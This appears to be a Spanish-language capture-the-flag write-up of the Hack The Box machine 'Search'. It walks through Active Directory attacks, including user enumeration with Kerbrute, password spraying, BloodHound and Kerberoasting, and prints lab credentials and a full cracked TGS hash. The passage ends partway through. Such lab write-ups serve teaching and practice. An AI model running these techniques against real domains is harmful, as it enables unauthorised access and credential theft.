This page looks best with JavaScript enabled

Hack The Box - Search

 •  ✍️ sckull
featured image

Tras realizar una enumeración de usuarios y encontrar credenciales en el sitio web realizamos Kerberoasting. Password Spraying nos dieron acceso a un siguiente usuario donde encontramos un archivo Excel con una lista de contraseñas, una de ellas nos dio acceso por Powershell Web. Finalmente encontramos una ruta en Bloodhound para obtener acceso a un usuario del grupo Domain Admin para finalmente acceder como Administrador.

Nombre Search box_img_maker
OS

Windows

Puntos 40
Dificultad Dificil
IP 10.10.11.129
Maker

dmw0ng
Matrix 
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[8, 7.4, 5.1, 4.9, 2.6],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         { 
            "label":"Maker Rate",
            "data":[0, 0, 0, 0, 0],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

Recon

nmap

nmap muestra multiples puertos abiertos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

# Nmap 7.91 scan initiated Fri Mar  4 22:59:35 2022 as: nmap -p53,80,88,135,139,389,443,445,464,593,3268,8172,9389,49666,49675,49676,49703,49714,49738 -sV -sC -oN nmap_scan 10.10.11.129
Nmap scan report for 10.10.11.129 (10.10.11.129)
Host is up (0.37s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-04 22:59:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-03-04T23:01:13+00:00; -5s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-03-04T23:01:13+00:00; -5s from scanner time.
| tls-alpn:
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-03-04T23:01:13+00:00; -8s from scanner time.
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
|_ssl-date: 2022-03-04T23:01:13+00:00; -5s from scanner time.
| tls-alpn:
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
49738/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -5s, deviation: 1s, median: -5s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-03-04T23:00:37
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar  4 23:01:22 2022 -- 1 IP address (1 host up) scanned in 106.92 seconds

RPC

Una sesion nula por RPC no muestra información, es necesario autenticación.

1
2
3
4
5
6

 π ~/htb/search ❯ rpcclient -U "" -N 10.10.11.129
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $>

Samba

Al igual que rpc, samba requiere de autenticación para acceder a los recursos compartidos.

1
2
3
4
5

 π ~/htb/search ❯ crackmapexec smb 10.10.11.129 -u '' -p '' --shares
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\: STATUS_ACCESS_DENIED
SMB         10.10.11.129    445    RESEARCH         [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
 π ~/htb/search

Ldap

ldap necesita de credenciales para obtener información.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

 π ~/htb/search ❯ ldapsearch -x -h 10.10.11.129 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#

#
dn:
namingcontexts: DC=search,DC=htb
namingcontexts: CN=Configuration,DC=search,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=search,DC=htb
namingcontexts: DC=DomainDnsZones,DC=search,DC=htb
namingcontexts: DC=ForestDnsZones,DC=search,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
 π ~/htb/search ❯ ldapsearch -x -h 10.10.11.129 -D '' -w '' -b 'DC=search,DC=htb'
# extended LDIF
#
# LDAPv3
# base <DC=search,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
 π ~/htb/search ❯

Web Site

Los Headers del sitio web muestran que corre un Microsoft IIS 10.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/search ❯ curl -sI 10.10.11.129
HTTP/1.1 200 OK
Content-Length: 44982
Content-Type: text/html
Last-Modified: Tue, 11 Aug 2020 10:13:04 GMT
Accept-Ranges: bytes
ETag: "5f3800c86fd61:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 04 Mar 2022 23:03:12 GMT

El sitio web presenta servicios, caracteristicas e información sobre la empresa (team, testimonios, etc.), además, en el formulario de contacto observamos el dominio search.htb el cual agregamos a /etc/hosts.

image

Directory Brute Forcing

feroxbuster muestra multiples paginas, una de ellas es /staff.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

 π ~/htb/search ❯ feroxbuster -u http://search.htb -w $MD --depth 1 -x asp,aspx,html

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.5.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://search.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)7
 🦡  User-Agent            │ feroxbuster/2.5.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [asp, aspx, html]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 1
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301      GET        2l       10w      148c http://search.htb/images => http://search.htb/images/
200      GET     1030l     2969w    44982c http://search.htb/index.html
200      GET       17l       76w      931c http://search.htb/main.html
301      GET        2l       10w      148c http://search.htb/Images => http://search.htb/Images/
403      GET       29l       92w     1233c http://search.htb/staff
301      GET        2l       10w      145c http://search.htb/css => http://search.htb/css/
200      GET     1030l     2969w    44982c http://search.htb/Index.html
301      GET        2l       10w      144c http://search.htb/js => http://search.htb/js/
200      GET       17l       76w      931c http://search.htb/Main.html
403      GET       29l       92w     1233c http://search.htb/Staff
301      GET        2l       10w      147c http://search.htb/fonts => http://search.htb/fonts/
301      GET        2l       10w      148c http://search.htb/IMAGES => http://search.htb/IMAGES/
200      GET     1030l     2969w    44982c http://search.htb/INDEX.html
301      GET        2l       10w      147c http://search.htb/Fonts => http://search.htb/Fonts/
200      GET      373l     1419w    19559c http://search.htb/single.html
301      GET        2l       10w      145c http://search.htb/CSS => http://search.htb/CSS/
301      GET        2l       10w      144c http://search.htb/JS => http://search.htb/JS/
200      GET       17l       76w      931c http://search.htb/MAIN.html
500      GET       80l      276w     3420c http://search.htb/%22julie%20roehm%22.aspx
500      GET       80l      276w     3420c http://search.htb/%22james%20kim%22.aspx
500      GET       80l      276w     3420c http://search.htb/%22britney%20spears%22.aspx

Restricted Site

Tras visitar la pagina /staff nos muestra que las credenciales que proporcionamos no tienen permisos para acceder a esta pagina.
image

Si recordamos, nmap muestra el puerto 445 (https), tras agregar https al sitio, observamos que pregunta por un certificado, por lo que para acceder a esta página es necesario contar con uno.
image

Enum Users

Kerbrute

Realizamos una enumeración de usuarios utilizando un wordlist de SecList, encontramos dos usuarios válidos. Sin embargo no obtuvimos mucha información en los diferentes servicios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

 π ~/htb/search ❯ ./kerbrute userenum -d search.htb xato-net-10-million-usernames-dup.txt --dc 10.10.11.129 -t 100

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 19:10:24 >  Using KDC(s):
2022/04/01 19:10:24 >   10.10.11.129:88

2022/04/01 19:10:55 >  [+] VALID USERNAME:    administrator@search.htb
2022/04/01 19:11:09 >  [+] VALID USERNAME:    research@search.htb
2022/04/01 19:11:51 >  [+] VALID USERNAME:    Administrator@search.htb
2022/04/01 19:51:39 >  [+] VALID USERNAME:    RESEARCH@search.htb
2022/04/01 19:54:18 >  Done! Tested 624370 usernames (4 valid) in 2634.573 seconds

Usernames

Si recordamos, en el sitio web hay una lista de nombres (en el apartado Team), utilizamos estos para crear un nuevo wordlist utilizando un Script en python.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
John Smith 
Christine Aguilar 
Robert Spears 
Bruce Rogers

Generamos 120 posibles nombres de usuarios.

1
2
3
4

 π ~/htb/search/usernames ❯ ./usernames.py team.txt > users.txt
 π ~/htb/search/usernames ❯ wc -l users.txt
120 users.txt
 π ~/htb/search/usernames ❯

Encontramos tres nombres de usuarios válidos con kerbrute.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

 π ~/htb/search ❯  ./kerbrute userenum -d search.htb usernames/users.txt --dc 10.10.11.129

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 20:24:26 >  Using KDC(s):
2022/04/01 20:24:26 >   10.10.11.129:88

2022/04/01 20:24:26 >  [+] VALID USERNAME:    keely.lyons@search.htb
2022/04/01 20:24:26 >  [+] VALID USERNAME:    dax.santiago@search.htb
2022/04/01 20:24:26 >  [+] VALID USERNAME:    sierra.frye@search.htb
2022/04/01 20:24:27 >  Done! Tested 120 usernames (3 valid) in 0.849 seconds
 π ~/htb/search ❯

Sin embargo ninguna combinación de los usuarios válidos nos permitio acceder por smb/ldap/rpc.

1
2
3
4
5

keely.lyons
dax.santiago
sierra.frye
administrator
research

Note - Creds

En el sitio web descubrimos una imagen donde se leen notas, en esta se mencionan nombres y una contraseña para ‘Hope Sharp’, vemos IsolationIsKey?, la cual podría ser la contraseña.
image

Creamos un wordlist con los nombres de usuarios y las palabras “relevantes”, nuevamente utilizamos el Script en python.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

Working from Home
Key staff to stay
Hospital Appointment
Harrods
9am Phisher Walter
Send password to Hope Sharp
IsolationIsKey?
Meeting with Board
Hunter and Jordan
Hunter Jordan
Jordan Hunter
Harrods Jordan
Harrods Hunter

Utilizamos kerbrute con el nuevo wordlist, vemos que hope.sharp es un usuario válido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

 π ~/htb/search ❯ ./kerbrute userenum -d search.htb --dc 10.10.11.129 wordlist_image.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 21:14:28 >  Using KDC(s):
2022/04/01 21:14:28 >   10.10.11.129:88

2022/04/01 21:14:28 >  [+] VALID USERNAME:    hope.sharp@search.htb
2022/04/01 21:14:28 >  Done! Tested 70 usernames (1 valid) in 0.506 seconds
 π ~/htb/search ❯

SMB - Hope Sharp

Password Spraying

Utilizamos el wordlist con todos los usuarios válidos que encontramos y realizamos Password Spraying con la “contraseña” IsolationIsKey?.

1
2
3
4
5
6

keely.lyons
dax.santiago
sierra.frye
administrator
research
hope.sharp

Observamos que hope.sharp es una combinación válida, como se menciona en la nota.

1
2
3
4
5
6
7
8
9

 π ~/htb/search ❯ crackmapexec smb search.htb -u usernames/valid_users.txt -p 'IsolationIsKey?' --continue-on-success
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] search.htb\keely.lyons:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [-] search.htb\dax.santiago:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [-] search.htb\sierra.frye:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [-] search.htb\administrator:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [-] search.htb\research:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
 π ~/htb/search ❯

Vemos tambien que las credenciales permiten el acceso por ldap.

1
2
3
4

 π ~/htb/search ❯ crackmapexec ldap search.htb -u 'hope.sharp' -p 'IsolationIsKey?'
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP        search.htb      389    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
 π ~/htb/search ❯

SMB

Enumeramos los recursos compartidos a los que Hope tiene acceso, vemos: CertEnroll, RedirectedFolders$.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

 π ~/htb/search ❯ crackmapexec smb search.htb -u 'hope.sharp' -p 'IsolationIsKey?' --shares
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
SMB         search.htb      445    RESEARCH         [+] Enumerated shares
SMB         search.htb      445    RESEARCH         Share           Permissions     Remark
SMB         search.htb      445    RESEARCH         -----           -----------     ------
SMB         search.htb      445    RESEARCH         ADMIN$                          Remote Admin
SMB         search.htb      445    RESEARCH         C$                              Default share
SMB         search.htb      445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         search.htb      445    RESEARCH         helpdesk
SMB         search.htb      445    RESEARCH         IPC$            READ            Remote IPC
SMB         search.htb      445    RESEARCH         NETLOGON        READ            Logon server share
SMB         search.htb      445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         search.htb      445    RESEARCH         SYSVOL          READ            Logon server share
 π ~/htb/search ❯

En CertEnroll encontramos tres certificados, aunque no son para el sitio restringido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

 π ~/htb/search/certenroll ❯ smbclient //search.htb/CertEnroll -U 'hope.sharp' # IsolationIsKey?
Enter WORKGROUP\hope.sharp's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Tue Apr  5 00:51:28 2022
  ..                                 Dc        0  Tue Apr  5 00:51:28 2022
  nsrev_search-RESEARCH-CA.asp       Ac      330  Tue Apr  7 03:29:31 2020
  Research.search.htb_search-RESEARCH-CA.crt     Ac      883  Tue Apr  7 03:29:29 2020
  search-RESEARCH-CA+.crl            Ac      735  Tue Apr  5 00:51:28 2022
  search-RESEARCH-CA.crl             Ac     1047  Tue Apr  5 00:51:28 2022

      3246079 blocks of size 4096. 420635 blocks available
smb: \>

En RedirectedFolders$ encontramos directorios con nombres de usuarios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

 π ~/htb/search ❯ smbclient //search.htb/RedirectedFolders$ -U 'hope.sharp' # IsolationIsKey?
Enter WORKGROUP\hope.sharp's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Tue Apr  5 22:27:00 2022
  ..                                 Dc        0  Tue Apr  5 22:27:00 2022
  abril.suarez                       Dc        0  Tue Apr  7 14:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 09:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 08:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 14:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 08:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 14:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 09:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 08:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 14:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 07:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 16:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 08:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 14:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 14:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 10:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 14:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 09:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 16:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 07:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 14:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 08:21:42 2020
  sierra.frye                        Dc        0  Wed Nov 17 20:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 16:14:26 2020

      3246079 blocks of size 4096. 420632 blocks available
smb: \>

Encontramos en el directorio de sierra.frye la flag user.txt pero no tenemos acceso a esta.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

smb: \sierra.frye\Desktop\> ls
  .                                 DRc        0  Wed Nov 17 20:08:00 2021
  ..                                DRc        0  Wed Nov 17 20:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 08:28:05 2020
  user.txt                           Ac       33  Wed Nov 17 19:55:27 2021

\sierra.frye\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:03:59 2020
  ..                               DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:00 2020

      3246079 blocks of size 4096. 420632 blocks available
smb: \sierra.frye\Desktop\> get user.txt
NT_STATUS_ACCESS_DENIED opening remote file \sierra.frye\Desktop\user.txt
smb: \sierra.frye\Desktop\>

SMB - Web_svc

BloodHound

Utilizamos Bloodhound.py para obtener información del AD, utilizando las credenciales de hope.sharp.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

 π BloodHound.py master ❯ ./bloodhound.py -u hope.sharp -p 'IsolationIsKey?' -d SEARCH.HTB -ns 10.10.11.129 -c all --zip
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 107 users
INFO: Found 64 groups
INFO: Found 0 trusts

[.. snip ..]

INFO: Done in 00M 46S
INFO: Compressing output into 20220405224732_bloodhound.zip
  π BloodHound.py master ❯ l
total 1.9M
drwxr-xr-x  6 kali kali 4.0K Apr  5 23:07 .
drwxr-xr-x 12 kali kali 4.0K Apr  5 22:33 ..
-rw-r--r--  1 kali kali 289K Apr  5 22:46 20220405224540_computers.json
-rw-r--r--  1 kali kali 2.5K Apr  5 22:45 20220405224540_domains.json
-rw-r--r--  1 kali kali  92K Apr  5 22:45 20220405224540_groups.json
-rw-r--r--  1 kali kali 246K Apr  5 22:45 20220405224540_users.json
-rw-r--r--  1 kali kali 202K Apr  5 22:47 20220405224652_computers.json
-rw-r--r--  1 kali kali 2.5K Apr  5 22:47 20220405224652_domains.json
-rw-r--r--  1 kali kali  92K Apr  5 22:47 20220405224652_groups.json
-rw-r--r--  1 kali kali 246K Apr  5 22:46 20220405224652_users.json
-rw-r--r--  1 kali kali 629K Apr  5 22:48 20220405224732_bloodhound.zip
drwxr-xr-x  6 kali kali 4.0K Mar  7 21:13 bloodhound
-rwxr-xr-x  1 kali kali   61 Mar  7 21:10 bloodhound.py
drwxr-xr-x  3 kali kali 4.0K Mar  7 21:11 build
-rw-r--r--  1 kali kali  855 Mar  7 21:10 Dockerfile
-rw-r--r--  1 kali kali  227 Mar  7 21:10 .editorconfig
drwxr-xr-x  8 kali kali 4.0K Mar  7 21:10 .git
-rw-r--r--  1 kali kali   49 Mar  7 21:10 .gitignore
-rw-r--r--  1 kali kali 1.1K Mar  7 21:10 LICENSE
drwxr-xr-x  2 kali kali 4.0K Mar  7 21:22 out
-rw-r--r--  1 kali kali 3.4K Mar  7 21:10 README.md
-rw-r--r--  1 kali kali 1.3K Mar  7 21:10 setup.py
 π BloodHound.py master ❯

Ejecutamos bloodhound e importamos el archivo zip generado.
image

Utilizando los queries predefinidos de bloodhound, listamos los usuarios Kerberoastables, vemos dos web_svc, krbtgt.
image

Kerberoasting

Utilizamos impacket para realizar Kerberoasting, tras ejecutar el script obtuvimos el hash del usuario web_svc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/search ❯ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -outputfile web_svc_kerberos
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 08:59:11.329031  <never>

 π ~/htb/search ❯ cat web_svc_kerberos
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$9e3da68e2397f9818dbf60d3b7ec89bc$9cce89c2d1111f89d641e3bc4f61b2b894f825354c4acf77d112a7f881824ede1bca3720de4dfe3e577d147d055aba669bcdec5fd63c128c9d4970787c0d5bfc621dbcd26de33e5707a552eeebb2f78400cd24975a2653a17987d311335f6b8da2d26617c8f40cc8d27aece739460529c211fccac30b3f84e3e2d615049f78fd1c283e3a2e4265e01ed7835fef1903a2f60f25ec9fe1d6579ca1a87d8f783d83df6252dc36e1c3af2434e88ffc6f94e54416e9e58111608d386a62e22f79d5ab0f8e698b293573a464347bd3225cf03cbfa0342150753ed2adfba17ce446e59fe0ee8350eb06b2e2e8f4d379f9c5f471bdccb29e98badf4419d3e0571510138e5ae2f4d7ab469690731cd220c90f3ea04d3e2e25fdba065ba808530b442dc6ab5120dcb64c40f020f2d32278d47cee2c9771e6ab8a4b4b980b7858712018d0bf6ecfdf703fb22ef271297b94a08a992545e477030c45306e7031869a4fb749cb2981cc52f23ce24605100ade6427848710a3c89c6002aa4595194ed70b7663b31a0ae6273ce695e66cff69d1883d19ccd537158feb252bfccdbb272c5b6b1c98a3843c9798c3ca59b4c212ec0e2f48c96ee344e08c6ec19b414875576fc78dba7db3297dc6c07e33e0b445e395993e5b0d5326280e502e9b8d7f1304aea083f907ccd695e4d0ae53566f17cb67020c8c82e641a097f20f887a89c7a8ccef0303a07c7489daf0b4c6faa12546649d950781c69a5965c1bb3928091acc103f347acf9781c731fecc00b07ed9d368c251662839fa302bd3dd0060994425449b40d3b69650b00c6c6b80e8f263b922b7e063c9cb1f07402904b295c4ff3d7971bc986aa82aa658dcd2f504bb6d7c21d9eb5e44cf561ee3eb62e8ea123de132afe171555b2d32ede6c60cd5e38388a55c5a171df811e645499c3dcd294ac5e3f7e851d391d2f7a2b3b639e56b1a5efc9fe56b97a872079f05bba897022fd48c4749cf291c8fd50fdc0718cdcf33d89d00dcf17b537614305dbff34c3bfba6af5f659ae8f3a18ec93e6f34f1a9b3f623c897b0fa614f68afdf289565219789c2c214f988d0dcfd4dedb47805ead3514e83189c950044f1a6ba6b5f5707e76ca8f3f68ac3683d689373d76c77a20fe545fb6979ae9474539539548e61729f777b2fc7d54bf8c6d379b67380bb5e6345f21ea0bfccc2d64a0600d0373b4d1469cf9d9ce0e831cd011c5fa5ee3ea0619376325548c057bd199645db442d680d4fc2436eb234978af2717098a8ba961e0fb2ddb3c10a593648801646054547a5bc7db4edb8b4183731a8b440cfde93c4bd308052e05c7d4c3cc0e0ac2b207d2c9169ac837f916093127a33e1b8677dbd81d7fac2e4f6728b0e05c68fa7d3f25603ace165d9fbd443708af2813a97514f77557b5a117046af3054eddb1cbca74fd18c4fce6c4a283fc9fe32e315215256d9778a4fae323264d3d9
 π ~/htb/search ❯

Password Hash Cracking

Utilizando John con el diccionario rockyou.txt logramos obtener en texto plano el valor del hash.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/search ❯ john --wordlist=$ROCK web_svc_kerberos
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@3ONEmillionbaby (?)
1g 0:00:00:07 DONE (2022-03-09 20:39) 0.1285g/s 1476Kp/s 1476Kc/s 1476KC/s @421eduymayte619..@#ann!#
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/search ❯

El usuario web_svc tiene acceso a los mismos recursos que hope.sharp, sin embargo no encontramos información nueva.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

 π ~/htb/search ❯ crackmapexec smb search.htb -u web_svc -p '@3ONEmillionbaby' --shares
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\web_svc:@3ONEmillionbaby
SMB         search.htb      445    RESEARCH         [+] Enumerated shares
SMB         search.htb      445    RESEARCH         Share           Permissions     Remark
SMB         search.htb      445    RESEARCH         -----           -----------     ------
SMB         search.htb      445    RESEARCH         ADMIN$                          Remote Admin
SMB         search.htb      445    RESEARCH         C$                              Default share
SMB         search.htb      445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         search.htb      445    RESEARCH         helpdesk
SMB         search.htb      445    RESEARCH         IPC$            READ            Remote IPC
SMB         search.htb      445    RESEARCH         NETLOGON        READ            Logon server share
SMB         search.htb      445    RESEARCH         RedirectedFolders$ READ,WRITE
